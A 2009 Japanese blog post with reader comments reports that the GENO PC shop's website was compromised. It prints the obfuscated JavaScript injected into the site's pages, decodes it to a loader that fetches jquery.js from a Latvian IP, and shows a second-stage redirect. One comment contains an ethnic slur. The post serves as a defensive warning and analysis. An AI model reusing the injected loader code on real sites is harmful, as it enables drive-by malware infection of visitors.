PCショップ「GENO」ウイルス感染っぽい
●発売日カレンダー
・6/22 [PS5] FINAL FANTASY 16
・7/21 [Switch] ピクミン 4
・7/28 [Switch] なつもん! 20世紀の夏休み
・8/25 [WIN] ARMORED CORE VI FIRES OF RUBICON
« NCsoft リネージュ2 クライアントPG 装備デザイナー募集中 | トップページ | セカンドスローン アルティメット 本日実装 »

2009年4月 5日

PCショップ「GENO」ウイルス感染っぽい [ パソコン関連 ]  

PCショップ「GENO」のオンラインショップがハッキングを受けて
ウイルスに感染している疑いがあります。
4月 7日現在解決されていません。

PC通販サイト「GENO」のサイトに改ざんの疑い(impress)
(impressにソース出ました)

各地にGENOのサイトに飛ばすURLが貼られており、
アクセスするだけでも非常に危険です。
短縮URL等も用いられてアクセスを誘う書き込みも見られる為、
URLをクリックする際は十分に注意して下さい。
(go.2ch2.net等でURL末尾にファイル名を加えて偽装する等)

ウイルスはadobe Flashとadobe Readerの脆弱性を使用している様で、
これらを最新版にアップデートしていないと、サイトを観覧しただけで
ウイルスに感染します。

Adobe Flash Player(adobe)
Adobe Reader(adobe)
FlashはどのPCでも入っている筈なので忘れずにアップデートを。
Readerは既にインストールされている場合はアップデートしましょう。

以下ソース解析。



GENOのサイトのソースに、JavaScriptを用いて記載がされています。

document.write(unescape('%3C4x4sWXkcr4Si4x4plct4x4%20P0srP0cWXk%3DC2%2F%2F4x49lc4lc%2EP02C247lc%2E4S2%2E1lc95%2FP0jP0qu4x4erP0y%2Ejs%3E4x4%3Cmb%2FC2s4x4cript4S%3E').replace(/WXk|4S|P0|4x4|mb|lc|C2/g,""))

暗号化されている文章を解除すると、

94.247.2.195/jquery.js

に飛ばす様記載されています。

IPアドレス 94.247.2.195
ホスト名 hs.2-195.zlkon.lv
IPアドレス割当国 ラトビア ( lv )

どうみてもショップとは関係無いIPです。

さらにjquery.jsの中身を見ると、また暗号化した文章があります。

fq%3CssoWcOTHriDpgpsoWt%20sOTHrc%3DOTHhDpgtsoWtDpgp:%2F%2F94soW%2EVV24Rp7%2E2Rp%2E19U6k5%2FneU6kwsfq%2F?iVVd%3Dfq1fq0RpZ%3E%3C%2FH5rscDpgrRpiptRp%3E').replace(/soW|VV|U6k|rV|fq|OTH|H5r|Dpg|Rp/g,"").replace(/Z/,navigator.appName.charAt(0)=='M'?'0':'1'))

解除すると、同じIPアドレスの違うファイルに飛ばしています。

94.247.2.195/news/?id=*
(*はブラウザの種類によって異なる数字)

※間違ってアクセスしない様、一部半角を全角に変換しています。

投稿者 (む) : 2009年4月 5日 16:03

▲ TOPに戻る

関連するかもしれない記事


コメント


1 :匿名: 2009年4月 6日 06:13 ID: 9pUJR3hg [RES]

こういった情報は非常に助かります 有難うございます


2 :匿名: 2009年4月 6日 10:10 ID: bq7kHgP6 [RES]

KEIAN製のSSDもマルウェア感染してましたねぇ。
net横町も2回改竄されてるし・・PCの世界も物騒になったねぇ


3 :匿名: 2009年4月 6日 10:11 ID: bq7kHgP6 [RES]

KEIAN製のSSDもマルウェア感染してましたねぇ。
net横町も2回改竄されてるし・・PCの世界も物騒になったねぇ


4 :匿名: 2009年4月 6日 11:24 ID: z.6BWFak [RES]

>>サイトを感染しただけでウイルスに感染します。

(む)様、文章おかしくないですか?
揚げ足取りのようで、申し訳ありませんが。


5 :匿名: 2009年4月 6日 18:13 ID: erOtGcL. [RES]

>>4
内容分かればこまけぇこたぁいいんだよ!!(AA省略)


6 :匿名: 2009年4月 7日 08:08 ID: SESszbgs [RES]

>>4
揚げ足取りって分かってるなら 書かなきゃいいだろ
せっかく情報載せてくれてるんだから
それとも グニャグニャに噛み砕いた流動情報しか
理解できないのか?


7 :匿名: 2009年4月 7日 09:01 ID: QPWlmGiQ [RES]

検索した時にサイト名の横に出てくるノートンのアイコンでは
安全なサイトってなってるんだけど…。
ノートンで判別できないものが仕掛けられてるってことなのかな。
良く分からないけどこわいですね。


8 :(む): 2009年4月 7日 17:02 ID: ZQepG5mw [RES]

今のところ一部のソフトが「検知」出来る様になっただけで、
「駆除」出来るソフトはまだ無いようです。
サイトに訪れて感染してしまった場合、
OS(Windows)をクリーンインストールしないと対処出来ません。


9 :malware: 2009年4月 7日 20:40 ID: OegzIzjo [RES]

aguse.jpは2009-03-25 15:10:24にアクセスしてますよ。(犯人はaguse.jpを利用してますか?)

投稿:( 7 :Anonymousに )http://safeweb.norton.com/は問題起こすURLのみに警告をする。 94.247.2.195は安全。 94.247.2.195/jquery.jsが「Trojan-Downloader.JS.Agent.dwf」危険。 http://safeweb.norton.com/はドメインレベルの評価を表示。 旧→http://www.siteadvisor.com/はリンクレベルでの表示しますから(今は不明)お試しを。


10 :匿名: 2009年4月 7日 22:31 ID: 2J1838FY [RES]

趣旨違いだったら申し訳ありません。
他のサイトにも埋め込まれているようです。
ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1324966798


11 :匿名: 2009年4月 8日 04:00 ID: 5oOsMBuQ [RES]

>>9
なぜバカチョンが


12 :富治: 2009年4月 8日 12:03 ID: j7kMHkyw [RES]

貴重な情報ありがとうございます!!
かなりのサイトが感染されているみたいですね。
弊社で管理しているサイトも見事に汚染されました。


13 :jQuery: 2009年4月10日 13:44 ID: .IVX4mr2 [RES]

jQueryを使うことによってその中に隠されたコードがバックドアになるって事でしょうか?
内のサイトも被害にあってjQueryが原因のようです。